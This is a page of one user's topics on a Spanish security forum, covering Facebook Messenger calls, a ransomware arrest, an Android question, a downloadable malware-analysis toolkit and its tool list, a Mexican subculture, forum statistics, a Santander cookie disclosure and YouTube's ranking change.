Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - el-brujo

#136
    Facebook ha habilitado en España su servicio de llamadas de voz a través de Facebook Messenger
    Podremos realizar llamadas usando VoIP a través de Facebook Messenger y comunicar con nuestros contactos de Facebook cómodamente
    El servicio requiere la conexión de datos del terminal o bien usar una conexión Wi-Fi
    Line ofrece un servicio similar

Hace ya algunas semanas que Facebook está probando en Facebook Messenger un servicio de llamadas IP con el que complementar su servicio de mensajería móvil y situarla, por ejemplo, al nivel de Line y hacer un hueco en un segmento bastante competitivo donde WhatsApp ocupa un papel dominante desde hace tiempo. Poco a poco, Facebook ha ido desplegando esta funcionalidad en zonas geográficas concretas, primero empezaron en Estados Unidos y han ido ampliando hasta llegar ayer a Reino Unido. ¿Y cuál es el siguiente paso? Pues por lo que podemos comprobar el siguiente país en recibir esta funcionalidad es España puesto que Facebook ha habilitado ya las llamadas gratuitas con Facebook Messenger.

Si tenemos instalado Facebook Messenger, realmente, no tendremos que hacer nada más y no hay necesidad de instalar una nueva versión de la aplicación ni nada parecido, simplemente tendremos que entrar en ella y la opción estará habilitada. ¿Y cómo se utiliza? ¿Cómo podremos realizar una llamada a través de Facebook Messenger? El uso es muy sencillo, lo único que tendremos que hacer es localizar a uno de nuestros contactos conectados al chat de Facebook (y que éste tenga Facebook instalado en su terminal) y pulsar sobre la opción que nos lleva al perfil del contacto para que veamos la opción de "realizar una llamada" y pulsar sobre ésta para llamar.




Así de sencillo, si tenemos una conexión de datos activa en el terminal podremos realizar llamadas telefónicas gratuitas usando la conexión Wi-Fi de nuestra casa o la conexión de datos 3G del terminal y aunque la calidad del sonido no es excepcional, el coste de la llamada (gratuito si tenemos tarifas planas de datos o Wi-Fi) sí que es interesante.

Cuando Facebook lanzó el servicio de manera experimental en Estados Unidos comentó que, a diferencia de las videollamadas de Facebook, éste no estaba implementado sobre la red de Skype sino que se había desarrollado un soporte propio del servicio para realizar estas llamadas IP con la idea de desarrollar un producto completo con el que hacer frente a WhatsApp o Line.

Poder realizar llamadas telefónicas de manera gratuita, sin duda, siempre es un aliciente; un detalle que WhatsApp no tiene pero sí que podemos ver en otros servicios como Viber o Line y que colocan a Facebook Messenger en ese sprint que busca hacerse un hueco como alternativa solvente a WhatsApp y donde tienen, como principal baza, los más de mil millones de usuarios que tiene esta red social.



fuente:
http://alt1040.com/2013/03/llamadas-gratuitas-con-facebook-messenger-espana
#137
La Brigada de Investigación Tecnológica detiene a un ruso de 27 años, cabecilla de "una de las mayores redes cibercriminales", que habría usado la imagen de la Policía y de la SGAE para 'multar' a miles de usuarios incautos.


El ransomware es un tipo de software malintencionado que -en nombre de distintos Cuerpos Policiales- bloquea el ordenador y solicita el pago de una multa de 100 euros por acceder a páginas que contienen pornografía infantil o webs de intercambio de archivos

Los agentes han desarticulado la célula financiera de la organización ubicada en la Costa del Sol y que blanqueaba el dinero logrado por este fraude, obteniendo sólo este grupo más de 1.000.000 € al año

Entre los arrestados se encuentra el responsable de la creación, desarrollo y difusión de las diferentes versiones del malware a nivel internacional: un ciudadano de 27 años y origen ruso que fue detenido en los Emiratos Árabes Unidos

En España, desde que se detectó en mayo de 2011, se han presentado más de 1.200 denuncias del conocido como "VIRUS DE LA POLICÍA", aunque el número de perjudicados es mucho mayor

La operación policial ha estado dirigida por la Brigada de Investigación Tecnológica de la Policía Nacional y ha contado con la colaboración de EUROPOL, -para coordinar los grupos de trabajo en otros países afectados-, además de INTERPOL.

El Cuerpo Nacional de Policía ha llevado a cabo una compleja investigación contra una de las mayores redes de cibercrimen dedicada a infectar con ransomware millones de ordenadores de todo el mundo y  obtener  unos beneficios que superarían el millón de euros anuales. Una operación que permanece abierta y en la que hasta ahora hay 11 detenidos.

El conocido en España como "el virus de la Policía" es un tipo de malware que bloquea el ordenador y solicita el pago de una multa de 100 euros por acceder a páginas que contienen pornografía infantil o webs de intercambio de archivos. Sólo en nuestro país, desde que se detectó el virus en mayo de 2011, se han presentado más de 1.200 denuncias aunque el número de perjudicados es con seguridad mucho mayor. La investigación realizada por la Brigada de Investigación Tecnológica (BIT) de la Policía Nacional se ha desarrollado a nivel internacional y ha afectado al menos a 22 países, siendo de especial importancia la colaboración de EUROPOL e INTERPOL para coordinar los grupos de trabajo en los países implicados.

"Hemos detectado 48 mutaciones del virus, todas creadas y difundidas por el mismo ciudadano ruso. Una de ellas usaba la imagen de la SGAE" para pedir una multa por la descarga de música en internet mediante programas P2P, ha explicado el inspector jefe.

La supuesta Policía anunciaba una multa de 100 euros para desbloquear el ordenador. El pago se debía hacer mediante tarjetas prepago para realizar compras en internet de manera anónima, como Ukash, Paysafecard y Moneypak.

El virus fue detectado en mayo de 2011, pero la Policía, ayudada por Europol e Interpol, no fue capaz de detener a su creador hasta diciembre de 2012.


Fuente: http://esmateria.com/2013/02/13/la-policia-caza-al-creador-del-virus-de-la-policia-y-la-sgae/

http://www.interior.gob.es/press/golpe-policial-a-una-de-las-mayores-redes-cibercriminales-especializada-en-infectar-millones-de-ordenadores-de-todo-el-mundo-14802

https://foro.elhacker.net/noticias/cae_una_red_que_infectaba_ordenadores_y_cobraba_multas_en_nombre_de_la_policia-t383127.0.html
#138
¿Alguien sabe dónde se encuentra la opción para desactivar los "Datos de referencia" en Android 4.0.4?

Antes que yo recuerde estaba en "Aplicaciones" y ahora dice en "Cuentas y sincronización" pero yo no l veo.

El móvil es un Samsung Galaxy SII
#139
Compilación actualizada por r32 de herramientas y servicios para analizar archivos, equipos y redes.
En esta versión se han añadido más servicios y herramientas con el propósito de un análisis más exhaustivo del sistema de archivos y registro, de ejecutables y documentos.

Se han compilado varias versiones:
LITE: Esta versión se enfoca más a la eliminación de malware de forma automática. Se incluyen las herramientas indispensables para analizar sistemas, redes y archivos sospechosos             y eliminar malware en general.
         Incluido navegador Firefox portable, para el resto de programas solo hay que pulsar sobre el botón para su descarga directa.  
     
Próximamente:
DVD: Versión completa donde se incluyen casi todos los programas para poder realizar casi cualquier consulta al sistema sin tener que descargar nada desde la red.

Descarga directa:

Versión LITE:
Ejecutable: http://ns2.elhacker.net/aio/old/AIO_elhacker_2013.rar
MD5: e06c4801fe360ba6eab833432dc3f39d
SHA1: 80c10bfbd665136cb5f8a6f7e39b075990afb727
Peso: 211 MB

Imagen ISO: https://ns2.elhacker.net/aio/old/AIO_elhacker_2013.iso
MD5: fbeef2e371094cad77ef3cc04289d197
SHA1: 9628933f81a9eadfe6aa5b26529cef04a21a9f23
Peso: 265 MB

Versión LITE (NEW 2015):

IEjecutable: https://ns2.elhacker.net/aio/old/EHN_2015_Lite.exe
MD5: D5819E5C483E992876EB2FFA8BD49375
SHA1: A23849DA8AF8324CA20EDC923AF47019F389E0CE
Peso: 197 MB

Imagen ISO: https://ns2.elhacker.net/aio/old/EHN_2015_Lite.iso
MD5: 52C8657619F13491409B06B4BD865E88
SHA1: A0CBD11FD73B491C8459FF3A48CBEB04EB2A1E67
Peso: 219 MB

Versión FULL (NEW 2015):


IEjecutable: https://ns2.elhacker.net/aio/old/EHN_2015_Full.exe
MD5: 28DD008BD290048F4B5C51F7291965B2
SHA1: 75EE5C6B974EA48BE2BB38CD5293073D1E73BA67
Peso: 609 MB

Imagen ISO: https://ns2.elhacker.net/aio/old/EHN_2015_Full.iso
MD5: 58023074B34BB083BD7065118396EFB2
SHA1: F96DE092377A2B80A6B3974A8B59BCD127454807
Peso: 643 MB

Versión DVD (NEW 2015):
Imagen ISO: https://ns2.elhacker.net/aio/old/EHN_2015_DVD.iso
MD5: FF7461C2CB76B3729C2C6A2FA1854B57
SHA1: F8979F6CE0BAB0F1293A3A23198E824449C83D77
Peso: 3,5 GB


El funcionamiento es idéntico al de la primera versión, el ejecutable (.exe) puede ser utilizado como portable en cualquier unidad de almacenamiento (SD, USB) y la imagen (.iso) para grabar en un CD.
No se puede iniciar el AIO antes del arranque de Windows, no es auto-arrancable antes del sistema operativo.
Compatible con Windows XP, W7, W8, W9 y W10 para sistemas de 32 y 64 bits.      

Mejoras de la versión:
Actualización de todos los programas y enlaces.
Navegador web, para usar en casos de emergencia cuando al pedir una página en tu navegador eres redireccionado a otros sitios fraudulentos.
Nuevos programas para analizar ejecutables y sistemas.
Enlace directo al sitio web respectivo en caso de fallar la descarga o para ver más información desde la página oficial.
Zona de respuesta a preguntas frecuentes.
Herramientas de análisis basadas en el sistema Linux, para su uso en máquina virtual principalmente.
Programas para analizar casi todo tipo de documentos.
Descarga directa de programas en versión portable (si está disponible).
Programas para analizar ejecutables de forma estática y dinámica.
Función para activar o desactivar el sonido del AIO.
Eliminada la Intro en flash (para evitar errores a los usuarios que no tengan instalado el control activeX de flash).
Permite abrir multiples instáncias.

Observaciones:

No tienes lector de CD en tu equipo:
Tutorial PDF: https://ns2.elhacker.net/aio/old/Instrucciones_para_grabar_los_LiveCD_en_una_unidad_USB.pdf


Capturas:


























Listado de herramientas y servicios incluidos:


- Servicios Online:

 - Análisis del Pc online:
    - ESET online Scanner.
    - Panda online Scanner.
    - TrendMicro online Scanner.
    - CA online Scanner.
    - Sunbelt online Scanner.
    - BitDefender online Scanner.
    - Mcafee online Scanner.
    - F-Secure online Scanner.
    - CA Threat online Scanner.
    - Webroot online Scanner.
 - Análisis de ejecutables:
  - Basados en firmas:
    - VirusChief online Scanner.
    - Dr. Web online Scanner.
    - Jotti online Scanner.
    - VirusTotal online Scanner.
    - Virscan online Scanner.
    - Avast online Scanner.
    - No Virus Thanks.
    - Meta Scan.
  - Basados en Sandbox:
    - Anubis online Scanner.
    - FortiGuard online Scanner.
    - Norman online Scanner.
    - ThreatExpert online Scanner.
    - CW Sandbox online Scanner.
    - GFI Threat Track.
    - JS Unpack.
    - Comodo I.M.A.
    - Wepawet.
    - MalBox.
    - ViCheck.
    - Xandora.
    - Panda autovin.
    - Eureka.
    - Malwr.
    - XecScan
 - Documentos:
    - Foca online.
    - PDF Examiner.
    - JSUnpack.
    - Webawet Iseclab.
    - Cryptam
    - Metadatos
    - PDF X-Ray
    - Gallus Honeynet.
 - Vulnerabilidades:
  - Vulnerabilidades de sistema:
    - Secunia
    - F-Secure Health Check  
  - Vulnerabilidades del navegador:
    - Browser Check
    - Botfrei Browser Check.
 - Ransomware / DNS:
  - Ransomware:
    - Kaspersky Deblocker.
    - VirusInfo Deblocker.
    - Dr.Web Unlocker.
    - Eset Winlock.
  - DNS:
    - DNS Changer.
    - Check DNS.
    - DNS Service ckecker.
    - Norton ConnectSafe.
 - Páginas web:
    - Url Void.
    - Link Scan.
    - Norton safe web.
    - Prevention Labs.
    - Dr. Web.
    - AVG Link Checker.
    - JS Unpack.
    - ASafaweb.
 - Procesos:
    - Alegsa.
    - Neuber.
    - El archivo.
    - Process Library.
    - PC Pit Stop.
    - Run Scanner.
 - Correo:
    - 10 minute mail.
    - Mail Expire.
    - Melt Mail.
    - Temp Email.
    - Guerrilla Mail.
    - HideMyAss.
 - Firewall / Wifi:
  - Firewall:
    - AuditMyPc.
    - HackerWatch.
    - LeakTest.
    - Comodo LeakTest.
  - Wi-Fi:
    - McAfee Wi-Fi Scan
 - Puertos:
    - NMap.
    - PcFlank.
    - Security Metrics.
    - T1 Shopper.
    - Internautas.
    - RadioToolbox.
 - Hijackthis / GSI / HiJackFree:
    - Hijackthis.de
    - Networktechs
    - GSI Parser
    - HiJackFree
 - Encode/decode:
    - Elhacker.
    - Translator Binary.
    - Oster Miller.
    - Vantir.
    - Dencoder.
    - SecurityXploded.
 - Anonimato/Web-proxy:
    - HideMyAss.
    - Zendproxy.
    - Anonymouse.
    - Proxy-web.
    - WebProxy.
    - Proxy.org.
    - KProxy.
    - SecureTunnel.
    - Mega Proxy.
    - Proxify.

- Live CD:
 - Anti-malware:
    - Kaspersky Rescue Disc.
    - AVG Rescue Disc.
    - Panda Safe CD.
    - BitDefender Rescue CD.
    - F-Secure Rescue CD.
    - Antivir Rescue System.
    - Dr. Web Live CD.
    - Spybot S&D Live CD.
    - eScan Life CD.
    - Emisoft Emergency Kit.
    - Comodo Rescue CD
    - Acronis Antimalware Scan CD
 - Linux:
    - Ubuntu.
    - KUbuntu.
    - XUbuntu.
    - Fedora.
    - Mandriva.
    - Linux Mint.
    - Open SUSE.
    - Debian.
    - Qubes.
    - Whonix.
    - Katana.
    - Lightweight Portable Security.
 - Miscelánea:
    - SARDU.
    - Hirens Boot CD.
    - GParted.
    - BartPE.
    - MSDaRT.
    - Inquisitor.
    - Network Security Toolkit.
    - SystemRescueCd.
    - BootRepair.
    - Ultimate Boot CD.
    - Super Fdisk.
    - Memtest.
    - Trinity Rescue Kit.

- Seguridad:
 - Firewall:
    - Outpost Agnitum Free.
    - Zone Alarm.
    - PC Tools Firewall Plus.
    - Comodo.
    - Ashampoo Firewall.
    - Online Armor.
 - Data Loss Prevention: (Son de pago)
    - TrendMicro.
    - McAfee.
    - Fortinet.
    - TrustWare.
    - WebSense.
    - CA Technologies.
 - Suites de seguridad:
    - PC Tools.
    - Ad-Aware Internet Security.
    - Forti Client.
    - Comodo.
 - Ids:
    - Snort.
    - OSSEC.
    - Suricata.
    - TrustWave.
    - Tripwire.
    - Samhain.
    - AIDE.
    - Acarm.
    - Bro IDS.
  - IDS basados en distribuciones de Linux:
    - Easy IDS.
    - Security Onion.
    - Smooth-Sec.
    - Snorby SSD.
 - Antivirus:
  - Antivirus portable:
    - Immunet Protect.
    - Mcafee Stinger.
    - ClamWin.
    - Comodo Cloud Scanner.
    - Adw Cleaner.
    - WinLockless.
  - Antivirus residentes:
    - AVG.
    - Avira antivir.
    - Avast.
    - Panda Cloud.
    - Pc Tools.
    - Microsoft Security Essentials.
    - Comodo.
  - Antivirus línea de comandos:
    - a-Squared.
    - Avira command line scanner.
    - Panda.
    - Sophos.
  - Removal tool:
    - Avira Antivir Removal Tool.
    - Kaspersky Security Scan.
    - Kapersky virus removal tool.
    - F-Secure Easy Clean.
    - Norman Malware Cleaner.
    - Sophos Virus Removal Tool.
    - Comodo Cleaning E.
    - Windows Malicious Software Removal Tool.
 - Antispyware:
    - Malwarebytes Antimalware.
    - Hitman Pro.
    - Ad-Aware.
    - Superantispyware.
    - RunScanner.
    - Dr.Web Cure It.
    - ComboFix.
    - A-Squared.
    - F-Secure Easy Clean.
    - Windows Defender.
    - Spybot Search & Destroy.
    - Spyware Blaster.
    - Microsft Safety Scanner.
    - Panda Cloud Cleaner.
 - Rogue / Ransomware:
  - Rogue:
    - Norton Power Eraser.
    - ERA Remover.
    - Remove Fake Antivirus.
    - Rogue Killer.
    - Unhide.
    - RKill.
  - Ransomware:
    - Polifix.
    - Avira Ransom File Unlocker.
    - Rannoh Decriptor.
    - Rector Decriptor.
    - Xorist Decriptor.
 - Antirootkit:
    - Gmer.
    - F-Secure BlackLight.
    - RUBotted.
    - Rootkit Revealer.
    - Sophos antirootkit.
    - Root Repeal.
    - XueTR.
    - Tuluka Kernel Inspector.
    - Kernel Detective.
    - Kernel Spy.
    - SSDT Hooks Revealer.
    - IAT Hooks Analyzer.
    - Rootkit Unhooker.
    - The Avenger.
    - Ice Sword.
    - Blitz Blank.
    - ListsParts.
 - Master Boot Record:
    - Avast aswMBR.
    - TDSSKiller.
    - Rootkit Buster.
    - BitDefender Bootkit Removal Tool.
    - MBR Fix.
    - Stealth MBR Rootkit Detector.
    - Norman TDSS Cleaner.
    - Norman Sinowal Cleaner.
    - Avira Boot Sector Repair Tool
 - Vacunas:
    - Kaspersky.
    - Eset.
    - McAfee.
    - BitDefender.
    - Symantec.
    - ViRobot.
    - AVG.
    - AhnLab.
 - Reparación:
    - RegUnlocker.
    - SM Fixer.
    - WinSock Fix.
    - Windows Repair Tool.
    - Mini Tool Box.
    - Kaspersky Clean Autorun.
    - Sergiwa antiviral Toolkit.
    - Avira DNS-Repair-Tool.
    - Antisecuestro.
    - AntiFreeze.
 - Test de seguridad:
    - Panda Cloud Cleaner.
    - Baseline Security Analyze.
    - Security Analyzer.

- Conexiones y redes:
 - Conexiones:
    - Current Ports.
    - TCP View.
    - ProcNetMonitor.
    - TCP Eye.
 - Redes:
    - Wireshark.
    - Network Monitor.
    - Smart Sniff.
    - Network Miner.
    - oSpy.
    - PRTG Network Monitor.
    - Network Protocol Analyzer.
    - Socket Sniff.
    - GFI Languard.
    - Nessus.
    - NMap.
    - Net Tools.
    - Wnet Watcher.
    - Network Security Tools.
    - Network traffic View.
    - Network Scanner.
    - Microsoft Baseline Security Analyzer.
    - Fiddler.
    - Angry IP Scanner.
    - Winpcap.
    - NetScan.
    - Cain&Abel.

- Análisis:
 - Análisis:
  - Máquinas virtuales:
   - Máquinas virtuales de sistema:
    - VMWare.
    - VirtualBox.
    - VirtualPC.
   - Máquinas virtuales de proceso:
    - Sandboxie.
    - BufferZone Pro.
  - Depurador:
   - IDA Pro Free.
   - Olly DBG.
   - Immunity Debugger.
   - EvoDBG.
   - Debuggin Tools.
   - DebugView.
   - HyperDBG.
   - WinPDB.
   - Debuggin tools.
   - Dump:
   - Procdump.
   - Explorer Suite.
   - Lord PE.
   - Import Reconstructor.
  - Portable eXecutable:
   - PEiD.
   - ExeInfo PE.
   - BinDie.
   - PE Explorer.
   - PE Detective.
   - PE Tools.
   - PE Reader.
  - Análisis con log:
   - AVZ.
   - SysInspector.
   - OTL.
   - Hijackthis.
   - GetSystem Info.
   - Killtrojan Syslog.
  - Editores:
   - Editor hexadecimal:
    - HxD.
    - WinHex.
    - HexEdit.
   - Editor de recursos:
    - ExeScope.
    - Resource hacker.
  - Análsis PDF:
   - pyPdf.
   - pdf-parser.
   - PDFTemplate.
   - Pdfid.
   - PDF Miner.
   - PDF Stream Dumper.
  - Vulnerabilidades/Servicios:
   - Driver View.
   - Advanced Windows Service Manager.
   - Securty Scan Plus.
   - Secunia PSI.
  - Descompresor:
   - Universal Extractor.
   - UPX.
   - Quick Unpack.
   - Faster Universal Unpacker.
   - Stripper.
   - InnoExtractor.
   - JS Unpack-n.
   - XRipper.
  - Metadatos:
   - MetaGoofil.
   - MetaStripper.
   - OOMeta Extractor
   - ExifTool.
   - DocScubber.
   - JPEG & PNG Stripper
  - Procesos:
   - Administrador de tareas:
    - Process Explorer.
    - Process Hacker.
    - Process Lasso.
    - Process Monitor.
   - Explorador de archivos:
    - Free Commander.
    - Total Commander.
   - Verificador de procesos:
    - RunScanner.
    - Process QuickLink.
    - Assassin SE.
    - Svchost Process Analyzer.
   - Dependéncias (dll):
    - Dependency Walker.
    - Dependens.
    - Auto Debug.
    - DLL Export Viewer.
   - BSOD:
    - Blue Screen View.
    - Who Crashed.
   - Verificación Hash de archivo:
    - HashTab.
    - XHashCalc.
  - Eliminación segura:
   - Unlocker.
   - File Assassin.
   - Reg Assassin.
   - OTM.
   - HardWipe.
   - Eraser.
   - Pocket Killbox.
  - Información del sistema:
   - CpuZ.
   - System Information for Windows.
   - HW Info.
   - Speccy.
   - CrystalDiskInfo.
   - HD Tune.
  - Análisis de comportamiento:
    - RegShot.
    - SysTracer.
    - MJ RegWatcher.
    - DrvMon.
    - Zero Wine.
    - Buster Sandbox.
    - Cuckoo Sandbox.
    - Minibis.
    - SysAnalyzer.
    - Windows File Analyzer.
    - Malcode Analysis Pack.
  - Envio de muestras de malware:
    - Microsoft.
    - Emisoft.
    - Sophos.
    - Lavasoft.
    - McAfee.
    - Threat Expert.
    - Eset.
    - Google.
    - Avira.
    - PcTools.
    - ThreatFire.
    - ClamAV.
    - Symantec.
    - F-Secure.
  - Decompilador:  
   - Detector de compilado:
    - RDG Packer Detector.
    - PEiD.
   - Decompilador:
    - VB Decompiler.
    - Delphi Decompiler (DeDe).
    - CHM Decoder.
    - Reflector.
    - ExeToC.
    - Interactive Delphi Reconstructor (IDR).
    - Decompile Flash.
    - ilSpy.
    - Dotnet IL Editor.
    - DotDeobfuscate.

 - Análisis forense:
  - Caine.
  - Autopsy.
  - FIRE.
  - WinFE.
  - SpinRite.
  - Sleuthkit.
  - REMnux.
  - SIFT.
  - FCUU.
  - Foremost.
  - EnCase.
  - Volatility.
  - Helix 3 Pro.
  - Registry Ripper.
  - Digital Forensic Framework
 - Steganografía:
  - Steganography Studio.
  - XStegSecret.
  - Hide & Reveal.
  - FileInjector.
  - Steghide.
  - JHide.
  - StegoSense.
  - Criptografía:
   - TrueCrypt.
   - PGP.
   - DiskCiptor.
   - AxCrypt.
   - Criptophane.
   - Decoded Cesar Strings.
   - Strings.
   - CIAT.
   - SnD Reverser Tool.
   - Hash&crypto Detector.
   - Cryptool.
   - Xor Search.
   - Gpg4win.
 - Audioría:
  - Wifiway.
  - Backtrack.
  - Beini.
  - Wifislax.
  - OSSIM.
  - Matriux.
  - Blackbuntu.
  - BugTrack.

- Navegador:
 - Navegadores:
    - Internet Explorer.
    - Mozilla Firefox.
    - Google Chrome.
    - Safari.
    - Opera.
    - Maxthon.
 - Navegación segura:
    - Tor.
    - XeroBank.
    - JAP.
    - UltraSurf.
    - UltraVPN
    - proXPN.
    - HideMyAss.
 - Complementos:
  - Google Chrome:
    - WOT.
    - NoScript.
    - Ad-Block Plus.
    - Dr.Web Link Checker.
  - Internet Explorer:
    - WOT.
    - Trend Protect.
    - Dr.Web Link Checker.
    - Windows Defender.
    - G-Data Cloud Security.
  - Opera:
    - WOT.
    - NoScript.
    - Ad-Block Plus.
    - Dr.Web Link Checker.
  - Mozilla Firefox:
    - WOT.
    - NoScript.
    - Ad-Block Plus.
    - Dr.Web Link Checker.
    - G-Data Cloud Security.
    - Better Privacy
    - Ghostery
    - Quick Java
    - BitDefender QuickScan
  - Safari:
    - WOT.
    - javascript Blocker.
    - ADBlock Plus.
    - Dr.Web Link Checker..
    - Traffic Light.
    - Ghostery.
    - Incognito.
    - Cookie Stumbler.
  - Silverlight:
    - Queda añadido a los demás exploradores.

- Optimización:
 - Mantenimiento:
    - CCleaner.
    - RegSeeker.
    - ATF Cleaner.
    - Jet Clean.
    - Revo Uninstaller.
    - Defragler.
    - Glary Utilities.
    - Argente Utilities.
    - NT RegOpt.
    - Erunt.
    - Memtest.
 - Formato:
    - TestDisc.
    - HD Hacker.
    - Hard Disk Sentinel.
    - MHDD.
    - HDD Scan.
    - HDD LLF.
    - HP USB DSFT.
    - Disc Investigator.
 - Desbloquear HDD y BIOS:
    - HDD Unlock.
    - Atapwd.
    - HDD PW.
    - Cmos Pwd.
    - Zú.
 - Recuperación:
    - Power Data Recovery.
    - Disk Digger.
    - PhotoRec.
    - Recuva.
    - SoftPerfect File Recovery.
    - Pandora Recovery.
    - Glary Undelete.
    - Smart NTFS Recovery.
    - Restoration.
    - Iso Buster.
    - PC Inspector Smart Recovery.
    - PC Inspector File Recovery.
    - CD Recovery Toolbox.
    - Free File Recovery.
 - Arranque:
    - Autoruns.
    - a-squared HiJackFree.
    - What In Startup.
 - Desinstalación AV:
    - Kaspersky.
    - Norton.
    - Trand Micro.
    - McAfee.
    - BitDefender.
    - Panda.
    - F-Secure.
    - Eset.
    - Avira Antivir.
    - AVG.
    - Avast.
    - WebRoot.
    - CA.
    - Norman.
    - Zone Alarm.
    - Threat Fire.
    - Microsoft Security Essetial.
    - eScan.
    - Dr.Web.
    - G-Data AVCleaner.
    - BullGuard.
    - Malwarebytes CleanUp Tool.
    - Microsoft One Care.

- Móvil:
 - Iphone:
    - Threat watch App.
    - WebRoot SecureWeb.
    - Smart Surfing.
 - Android:
    - Avast Mobile Security.
    - Dr.Web Antivirus Light.
    - Avira Free Android Security.
    - Zoner antivirus free.
    - ThreatWatch App.
    - Lookout Mobile Security.
    - WebRoot Secure Anywhere.
    - McAfee Mobile Security.
 - Blackberry:
    - NetQin.
    - BlackBerry Protect.
    - ThreatWatch App.
 - Symbian:
    - NetQin Mobile Antivirus.
    - Lookout Mobile Security.
    - SpyBot Search&Destroy.
    - MobiShield.

- Miscelánea:
 - Administración remota:
   - Putty.
   - WinSCP.
   - CygWin.
   - FileZilla.
   - TeamViewer.
   - UltraVNC.
 - Control parental:
   - Anti-porn.
   - PicBlock.
   - Parental Filter.
   - Any Weblock.
   - k9 Web Protection.
   - Norton Online Family.
 - Drivers:
   - Hewlett-Packard.
   - ASRock.
   - Asus.
   - Intel.
   - AMD.
   - MSI.
   - Gigabyte.
   - Acer.
   - PC Chips.
   - Dell.
   - Biostar.
   - Toshiba.
   - Gateway.
   - eMachines.
   - Packard Bell.
   - Sony.
   - Foxconn.
   - Canon.
   - Nvidia.
   - Oki.
   - Solo Drivers.
   - Driver Guide.
   - NoDevice.
   - Help Drivers.
 - Firmware:
   - Orange.
   - Movistar.
   - Jazztel.
   - Cisco.
   - D-Link.
   - Linksys.
   - Netgear.
   - Solwise.
   - Belkin.
   - Gigabit.

 - Soporte técnico:
   - Ingreso al foro.
   - Registro en el foro.
   - Foro de seguridad.
   - Enlace a Twitter.
   - Wiki.
   - Warzone.
   - Problemas comunes (resolución de problemas frecuentes).
   - Navegador web independiente.

- Tutoriales:
 - Varios:
   - Modo seguro.
   - Archivo host.
   - System Volume Information.
   - Desfragmentación de discos.
   - Leer BSOD.
 - Reparación del sistema operativo:
   - Reparar restaurar sistema
   - Pantallazos azules (BSOD)
   - Reparar registro
   - Reparar arranque Windows 7
   - Reparar disco duro
   - Restaurar sistema Windows 7
 - Análisis de malware:
   - Malware Cheat Sheet
   - Seguridad Informatica
   - Análisis de malware
   - FTK DataSheet
   - Computer Forensics T.T
   - E-Zines
   - Limpiar WORM red corporativa
   - Eliminación de malware.
 - Criptografía:
   - Criptografía asimétrica
   - Applied Cryptography FAILs
   - Criptografía (wikipedia).
   - Taller (foro).
   - Glosario (foro).
 - Miscelánea:
   - Tabla de errores.
   - Procesos.
   - Particiones.
   - Partición oculta Windows 7.
   - DHCP.
   - Servicios Windows XP.
   - Privilegios cuentas Windows 7.
   - Comandos Windows XP.
   - Comandos Windows 7.
   - Valores de BIOS.
   - MBR y Boot.
 - Análisis forense:
   - Evidencia digital.
   - Metadatos.
   - Inyección de código en PDF.
 - Tutoriales de programas:
   - AVZ de Kaspersky.
   - SysInspector de Eset.
   - OTL de OldTimer.
   - Buster Sandbox Analyzer.
   - SysAnalyzer Trainer.
   - ERDNT.
   - Rootkit Revealer.
   - TestDisk.
   - Process Monitor.
   - Process Explorer.
   - Current Ports.
   - DLL Export Viewer.
   - TCP View.
   - WNetWatcher.
   - Autoruns.
   - Network Traffic View.
   - BlueScreenView.
   - Guía de AVZ.
   - Revo Uninstaller.
   - WinPDB.
   - NMap.
   - Lightweight Portable Security.


Esperamos os sea de utilidad, saludos.
#140
A los que son de México... ¿Esto existe de verdad?



Citar
Desde hace varias décadas proliferan en México tribus urbanas que para nuestra fortuna parecen cumplir ciclos y desaparecer con el paso del tiempo. Una de esas nuevas tribus urbanas y que en el último año fue toda una revelación en Internet fueron los Cholombianos.

Es justo como lo estas pensando, una combinación de los clásicos cholos mexicanos con gustos musicales por la cumbia colombiana. Nadie sabe a ciencia cierta como se originó este fenómeno social, algunos mencionan que los culpables de la proliferación de los Cholombianos son los sonideros del Distrito Federal, que luego de llevar su música a Monterrey fue adoptada por una gran parte de las comunidades marginadas que la hicieron propia y la transformaron en una moda y finalmente en una forma de vida.

Las "cumbias rebajadas", como popularmente se conoce al estilo de música, les proporciona una identidad que los distingue del resto de las personas en Monterrey, los Cholombianos definen su estilo como Punk Tropical.

Es evidente la influencia de los tradicionales cholos en el atuendo de los Cholombianos, pero además visten casi de forma exagerada imágenes religiosas y algunas veces sus atuendos hacen referencia a la violencia creciente que se vive en todo el país desde hace años.

Del estilo de cabello no podemos decir mucho, pareciera que entre más irregular y extravagante sea, mayor será su aceptación frente al grupo social. Eso si, las patillas con gel son la onda.













Fuente:
http://marcianos.com.mx/los-cholombianos/
#141
Usuarios que más han publicado este año


wolfbcn   4596
EleKtro H@cker   2296
Aprendiz-Oscuro   1965
dato000   1255
crazykenny   1216
$Edu$   1159
simorg   1152
dimitrix   1053
Jenag   1051
P4nd3m0n1um   986


Mensajes con más respuestas

Asunto    Vistas    Respuestas

Codigos de unlock ( Liberacion) para PANTECH gratis    74,704    992
REAVER: Vulnerabilidad de WPA por WPS habilitado    171,843    884
liberar por MEP2 blackberry 8xxx,9xxx (((( GRATIS ))) lo miro todos los dias    28,449    625
WPSCrackGUI v1.2.0 -BETA- (11-11-2012)    123,816    406
Codigos unlock (Liberacion) para ZTE Android y Generic - Huawei y mas. Gratis..    33,846    323
Concurso Nº1: "Hack My Server"    19,351    236
RETOS C++    7,052    163
¿Por qué soy ateo?    7,293    154
[Finalizado] Hackea a elhacker.net v2.0 (ganador: yoya)    27,147    142
Proyecto C/C++    4,475    132


bueno va, me lo curraré un poco más y haremos el de mensajes más vistos en el año 2012 también, pero otro día :P

¡Feliz Año!
#142
http://seclists.org/fulldisclosure/2012/Oct/101

Pillan al Banco de Santander guardando los números de las tarjetas de crédito en las cookies. "Lo del Santander es un chiste en cuanto a seguridad. Hartos de batallar con ellos durante dos años para arreglar lo que cualquier otro banco hubiera arreglado en minutos, cosas como XSS en las páginas de inicio etc. Ya es hora de divulgar estos temas con la esperanza de que cambien su forma de actuar y se tomen la seguridad de sus clientes en serio"
#143
YouTube ha anunciado un gran cambio que afecta a la clasificación de los vídeos alojados en su portal. El ranking de los "mejores" se va a establecer por el tiempo de visualización y no por el número de visitas recibidas. Este movimiento va a favorecer los vídeos de alta calidad y todos aquellos que de verdad tienen algo que contar.

Hasta la fecha, la clasificación estaba basada en los clic recibidos, una costumbre muy extendida en la Red, que favorece más las portadas atractivas que los contenidos. Ahora se va a premiar más el tiempo en que un vídeo captura al espectador, manteniendo su interés.

